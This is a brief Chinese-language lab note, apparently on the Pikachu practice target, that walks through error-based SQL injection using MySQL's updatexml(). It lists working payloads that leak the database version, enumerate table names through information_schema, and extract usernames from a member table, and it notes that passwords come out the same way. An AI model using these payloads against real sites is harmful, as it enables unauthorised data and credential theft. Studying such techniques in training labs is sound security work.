先写一下数据库的指令:
kobe' and updatexml(1,concat(0x7e,version()),0)#
这与之前发布的文章里类似,这里利用函数报错的信息
updatexml()是一个专门报错的函数 ,里面会加入一些正常的语句来获取信息
获取到版本号
写长点的语句
kobe' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 1,1)),0)#
information_schema.tables:
详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。
select table_name
查询的表名
以上可以获取到表名和字段名等等,只要变换里面的名字
新一段数据库指令(获取用户名,同理可以获取密码)
kobe' and updatexml(1,concat(0x7e,(select username from member limit 1,1)),0)#